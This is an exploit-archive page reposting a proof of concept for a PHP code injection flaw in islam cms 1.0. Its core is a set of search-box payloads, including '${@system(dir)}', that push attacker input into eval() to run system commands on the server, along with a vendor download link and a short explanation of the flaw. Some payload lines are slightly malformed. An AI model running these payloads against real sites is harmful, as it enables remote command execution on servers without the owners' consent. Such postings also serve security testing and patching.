Advertisement






islam cms 1.0 PHP code injection Vulnerability

CVE Category Price Severity
N/A CWE-20 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2018-03-03
CPE
cpe:cpe:/a:islam_cms:islam_cms:1.0
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018030024

Below is a copy:

islam cms 1.0 PHP code injection Vulnerability
| # Title    : islam cms 1.0 PHP code injection Vulnerability
| # Author   : indoushka
| # email    : [email protected]
| # Tested on: windows 8.1 Franais V.(Pro)
| # Vendor   : http://almohtaref.net/islamcms_1.0.zip
=============================================================

PHP code injection :

This script is vulnerable to PHP code injection.

PHP code injection is a vulnerability that allows an attacker 
to inject custom code into the server side scripting engine. 
This vulnerability occurs when an attacker can control all or 
part of an input string that is fed into an eval() function call. 
Eval will execute the argument as code.

This vulnerability affects /islamcms/index.php
 
poc : 

In the search box use payload :

http://127.0.0.1/islamcms/index.php?name=search

${@system(dir)}

${@print inoushka}

word=%24%7b%40print indoushka}%7d


Greetz : 
jericho  http://attrition.org & http://www.osvdb.org/ * http://packetstormsecurity.com * http://is-sec.org/cc/
Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * Larry W. Cashdollar*
---------------------------------------------------------------------------------------------------------------

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum